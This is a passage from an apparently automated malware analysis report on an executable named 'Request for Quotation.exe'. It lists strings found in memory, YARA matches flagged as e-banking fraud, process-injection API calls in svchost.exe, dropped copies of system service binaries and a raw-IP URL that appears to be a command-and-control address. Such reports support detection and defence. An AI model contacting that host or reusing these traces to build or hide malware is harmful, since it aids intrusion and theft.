00000000.00000003.1757640309.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1741023686.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743658598.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746039694.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740158447.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1742733827.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1740677014.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1743149995.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1745556871.0000000000E72000.00000004.00000020.00020000.00000000.sdmp, Request for Quotation.exe, 00000000.00000003.1746541463.0000000000E72000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177:80/miswwsapbqmsir&&$
          Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
          Source: elevation_service.exe.0.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith

          E-Banking Fraud

          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 19.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000013.00000002.2017731706.0000000003310000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000002.2016638909.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: Request for Quotation.exe, 00000000.00000000.1703958435.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0a96a4c9-2
          Source: Request for Quotation.exe, 00000000.00000000.1703958435.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_cb321cf7-4
          Source: Request for Quotation.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1657f8ed-e
          Source: Request for Quotation.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_1737610c-4
          Source: initial sampleStatic PE information: Filename: Request for Quotation.exe
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0042CA93 NtClose,19_2_0042CA93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035735C0 NtCreateMutant,LdrInitializeThunk,19_2_035735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572B60 NtClose,LdrInitializeThunk,19_2_03572B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572DF0 NtQuerySystemInformation,LdrInitializeThunk,19_2_03572DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03574340 NtSetContextThread,19_2_03574340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573010 NtOpenDirectoryObject,19_2_03573010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573090 NtSetValueKey,19_2_03573090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03574650 NtSuspendThread,19_2_03574650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572BF0 NtAllocateVirtualMemory,19_2_03572BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572BE0 NtQueryValueKey,19_2_03572BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572B80 NtQueryInformationFile,19_2_03572B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572BA0 NtEnumerateValueKey,19_2_03572BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572AD0 NtReadFile,19_2_03572AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572AF0 NtWriteFile,19_2_03572AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572AB0 NtWaitForSingleObject,19_2_03572AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035739B0 NtGetContextThread,19_2_035739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572F60 NtCreateProcessEx,19_2_03572F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572F30 NtCreateSection,19_2_03572F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572FE0 NtCreateFile,19_2_03572FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572F90 NtProtectVirtualMemory,19_2_03572F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572FB0 NtResumeThread,19_2_03572FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572FA0 NtQuerySection,19_2_03572FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572E30 NtWriteVirtualMemory,19_2_03572E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572EE0 NtQueueApcThread,19_2_03572EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572E80 NtReadVirtualMemory,19_2_03572E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572EA0 NtAdjustPrivilegesToken,19_2_03572EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573D70 NtOpenThread,19_2_03573D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572D10 NtMapViewOfSection,19_2_03572D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03573D10 NtOpenProcessToken,19_2_03573D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572D00 NtSetInformationFile,19_2_03572D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572D30 NtUnmapViewOfSection,19_2_03572D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572DD0 NtDelayExecution,19_2_03572DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572DB0 NtEnumerateKey,19_2_03572DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572C70 NtFreeVirtualMemory,19_2_03572C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572C60 NtCreateKey,19_2_03572C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572C00 NtQueryInformationProcess,19_2_03572C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572CC0 NtQueryVirtualMemory,19_2_03572CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572CF0 NtOpenProcess,19_2_03572CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03572CA0 NtQueryInformationToken,19_2_03572CA0
          Source: C:\Windows\System32\AppVClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\398ce0ec3b45a4be.bin
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C37C006_2_00C37C00
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C5A8106_2_00C5A810
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C379F06_2_00C379F0
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C62D406_2_00C62D40
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C592A06_2_00C592A0
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C5EEB06_2_00C5EEB0
          Source: C:\Windows\System32\AppVClient.exeCode function: 6_2_00C593B06_2_00C593B0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009BA81010_2_009BA810
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_00997C0010_2_00997C00
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009979F010_2_009979F0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009C2D4010_2_009C2D40
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009BEEB010_2_009BEEB0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009B92A010_2_009B92A0
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 10_2_009B93B010_2_009B93B0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD7C0011_2_00CD7C00
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CFA81011_2_00CFA810
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CD79F011_2_00CD79F0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00D02D4011_2_00D02D40
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CF92A011_2_00CF92A0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CFEEB011_2_00CFEEB0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 11_2_00CF93B011_2_00CF93B0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_0056A81013_2_0056A810
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00547C0013_2_00547C00
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_00572D4013_2_00572D40
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005479F013_2_005479F0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_0056EEB013_2_0056EEB0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005692A013_2_005692A0
          Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 13_2_005693B013_2_005693B0
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A515C14_2_007A515C
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007651EE14_2_007651EE
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_007A39A314_2_007A39A3
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00766EAF14_2_00766EAF
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079598014_2_00795980
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079D58014_2_0079D580
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079C7F014_2_0079C7F0
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_00767F8014_2_00767F80
          Source: C:\Windows\SysWOW64\perfhost.exeCode function: 14_2_0079378014_2_00793780
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_0079A81018_2_0079A810
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_00777C0018_2_00777C00
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007A2D4018_2_007A2D40
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007779F018_2_007779F0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_0079EEB018_2_0079EEB0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007992A018_2_007992A0
          Source: C:\Windows\System32\Spectrum.exeCode function: 18_2_007993B018_2_007993B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00401ACB19_2_00401ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0042F0B319_2_0042F0B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_004101D319_2_004101D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_004032F019_2_004032F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402A9019_2_00402A90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040E3D319_2_0040E3D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_004103F319_2_004103F3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00416B8E19_2_00416B8E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00416B9319_2_00416B93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00401C4019_2_00401C40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00401C3A19_2_00401C3A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040E51C19_2_0040E51C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040E52319_2_0040E523
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402E4919_2_00402E49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402E5019_2_00402E50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_00402F1919_2_00402F19
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0040272019_2_00402720
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FA35219_2_035FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352D34C19_2_0352D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F132D19_2_035F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036003E619_2_036003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F019_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0358739A19_2_0358739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E027419_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C019_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A019_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360B16B19_2_0360B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F17219_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0357516C19_2_0357516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA11819_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353010019_2_03530100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F81CC19_2_035F81CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036001AA19_2_036001AA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354B1B019_2_0354B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF0CC19_2_035EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035470C019_2_035470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F70E919_2_035F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FF0E019_2_035FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356475019_2_03564750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354077019_2_03540770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353C7C019_2_0353C7C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FF7B019_2_035FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F16CC19_2_035F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355C6E019_2_0355C6E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F757119_2_035F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354053519_2_03540535
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DD5B019_2_035DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360059119_2_03600591
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F244619_2_035F2446
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353146019_2_03531460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FF43F19_2_035FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EE4F619_2_035EE4F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FAB4019_2_035FAB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFB7619_2_035FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F6BD719_2_035F6BD7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0357DBF919_2_0357DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355FB8019_2_0355FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFA4919_2_035FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F7A4619_2_035F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B3A6C19_2_035B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EDAC619_2_035EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353EA8019_2_0353EA80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DDAAC19_2_035DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03585AA019_2_03585AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354995019_2_03549950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B95019_2_0355B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355696219_2_03556962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360A9A619_2_0360A9A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035429A019_2_035429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354284019_2_03542840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354A84019_2_0354A840
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035AD80019_2_035AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356E8F019_2_0356E8F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035438E019_2_035438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035268B819_2_035268B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B4F4019_2_035B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFF0919_2_035FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03560F3019_2_03560F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03582F2819_2_03582F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03532FC819_2_03532FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03541F9219_2_03541F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFFB119_2_035FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540E5919_2_03540E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FEE2619_2_035FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FEEDB19_2_035FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03552E9019_2_03552E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FCE9319_2_035FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03549EB019_2_03549EB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F1D5A19_2_035F1D5A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03543D4019_2_03543D40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F7D7319_2_035F7D73
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354AD0019_2_0354AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355FDC019_2_0355FDC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353ADE019_2_0353ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03558DBF19_2_03558DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03540C0019_2_03540C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B9C3219_2_035B9C32
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03530CF219_2_03530CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FFCF219_2_035FFCF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0CB519_2_035E0CB5
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D4A81020_2_00D4A810
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D27C0020_2_00D27C00
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D279F020_2_00D279F0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D52D4020_2_00D52D40
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D4EEB020_2_00D4EEB0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D492A020_2_00D492A0
          Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 20_2_00D493B020_2_00D493B0
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 85 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 87 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 253 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 36 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 105 times
          Source: elevation_service.exe0.0.drStatic PE information: Number of sections : 12 > 10
          Source: elevation_service.exe.0.drStatic PE information: Number of sections : 12 > 10
          Source: Request for Quotation.exe, 00000000.00000003.1706894621.0000000003ED0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamearmsvc.exeN vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000000.00000003.1711430159.0000000003F20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameALG.exej% vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000000.00000003.1732564274.00000000040F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameDiagnosticsHub.StandardCollector.Service.exeD vs Request for Quotation.exe
          Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
          Source: Request for Quotation.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Request for Quotation.exeStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: maintenanceservice.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msdtc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: msiexec.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: PerceptionSimulationService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: perfhost.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: Locator.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: MsSense.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: armsvc.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: alg.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: AppVClient.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: DiagnosticsHub.StandardCollector.Service.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: FXSSVC.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: elevation_service.exe0.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: SensorDataService.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: snmptrap.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
